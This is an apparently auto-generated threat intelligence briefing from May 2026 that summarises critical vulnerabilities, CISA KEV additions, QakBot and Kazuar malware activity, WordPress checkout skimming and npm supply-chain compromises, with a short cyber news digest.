Cyber Threat Briefing

PUBLISHED 17 May 2026, 11:01 UTC

CLASSIFICATION TLP:CLEAR

AUTO-GENERATED PureTensor Cyber Intelligence

Critical CVEs

High CVEs

KEV Added

New IOCs

Malware Samples

Active C2s

CRITICAL

DELTA — CHANGES SINCE LAST BRIEFING

New KEV entry: CISA added CVE-2026-42897 (Microsoft Exchange XSS) based on active exploitation.
CVE-2026-20182 (Cisco Catalyst SD-WAN Controller auth bypass) now widely confirmed as actively exploited with admin access.
Active exploitation reported for Funnel Builder WordPress plugin skimming attacks and expanded P2P botnet activity from Kazuar.
No changes to Feodo Tracker except confirmation that QakBot C2 at 50.16.16.211:443 remains online.

THREAT LEVEL ASSESSMENT

The overall threat level is assessed as CRITICAL due to multiple actively exploited vulnerabilities in Microsoft Exchange, Cisco SD‑WAN, and high-volume exploitation of WordPress ecosystems, combined with ongoing activity from established malware families such as QakBot and newly enhanced P2P backdoors like Kazuar. The convergence of fresh KEV additions, active zero‑day exploitation at Pwn2Own, and persistent supply‑chain compromises increases the likelihood of both targeted intrusions and automated broad attacks.

CRITICAL VULNERABILITIES

CVE	Product	CVSS	Status	Impact
CVE-2020-37228	iDS6 DSSPro Digital Signage System 6.2	9.8	Not confirmed exploited	Authentication bypass via CAPTCHA retrieval enabling brute‑force attacks.
CVE-2020-37239	libbabl 0.1.62	9.8	Not confirmed exploited	Double‑free bypass allowing memory safety violations and potential RCE.
CVE-2021-47952	Python jsonpickle 2.0.0	9.8	Not confirmed exploited	RCE through malicious JSON containing py/repr objects invoking eval.
CVE-2026-42897	Microsoft Exchange Server	High (no CVSS published)	Actively exploited (KEV)	XSS enabling remote code execution via crafted email.

ACTIVE EXPLOITS & KEV

CVE	Vendor/Product	Added to KEV	Remediation Due	Status
CVE-2026-42897	Microsoft Exchange Server	2026-05-15	2026-05-29	Active exploitation confirmed
CVE-2026-20182	Cisco Catalyst SD-WAN Controller	2026-05-14	2026-05-17	Active exploitation confirmed; admin access possible

MALWARE & THREAT ACTORS

QakBot: Feodo Tracker reports one active C2 endpoint: 50.16.16.211:443, continuously online since December 2025. QakBot remains a high-value threat for credential theft, lateral movement, and ransomware staging.

Kazuar (Turla): Recent intelligence indicates the backdoor has evolved into a modular P2P botnet designed for long-term persistence, stealth, and distributed C2 linkage. This significantly enhances operational resilience against takedown attempts.

WordPress Threat Ecosystem: Active skimming attacks leveraging the Funnel Builder plugin continue, with adversaries injecting malicious JavaScript into WooCommerce checkout pages. This aligns with broader card‑stealing operations targeting the e‑commerce ecosystem.

Node‑IPC Supply Chain Compromise: Multiple malicious versions of node‑ipc were published with credential‑stealing payloads, heightening risks for developers and CI/CD environments depending on compromised npm modules.

CYBER NEWS DIGEST

Microsoft Exchange Server XSS Zero‑Day Exploited (The Hacker News, Microsoft): Attackers are leveraging CVE‑2026‑42897 to execute code on on‑prem Exchange environments via crafted emails. Microsoft issued mitigations and CISA added it to KEV, indicating confirmed exploitation and urgency for patching.

Cisco Catalyst SD-WAN Auth Bypass Actively Exploited (CISA Alerts, The Hacker News, Dark Reading): CVE‑2026‑20182 enables unauthenticated access to SD‑WAN Controller environments. Exploitation has resulted in full admin access in observed incidents. CISA remediation deadline is imminent.

WordPress Funnel Builder Plugin Actively Abused for Checkout Skimming (Bleeping Computer, The Hacker News): A critical vulnerability is being weaponized to inject malicious JS into WooCommerce checkout flows. The campaign resembles Magecart-style operations, with active theft of credit card data.

Kazuar Transformed into Modular P2P Botnet (The Hacker News, Bleeping Computer): Turla’s long-running backdoor has evolved into a distributed P2P malware platform, improving stealth and persistence. The botnet architecture reduces reliance on centralized C2 and complicates detection.

Canvas Breach Causes Nationwide Education Disruptions (Krebs on Security): Extortion-driven outages impacted schools and universities across the U.S., highlighting downstream operational risk from third-party education platforms.

Supply Chain Attack Hits node‑ipc npm Package (Bleeping Computer, The Hacker News): Malicious actors injected secret‑stealing code into multiple versions of node‑ipc, targeting developer machines and CI environments. This continues the trend of supply chain compromises within npm.

OpenAI Employee Devices Impacted by TanStack Attack (The Hacker News): A supply-chain attack (Mini Shai‑Hulud) compromised two internal OpenAI employee devices, though no customer or production data was impacted. This incident underscores the expanding risk of developer‑tool compromises.

Russia-Linked Router Exploitation Campaign Steals Microsoft Office Tokens (Krebs on Security): Russian military‑aligned groups weaponized vulnerabilities in outdated routers to harvest authentication tokens, fueling espionage campaigns targeting Microsoft Office users globally.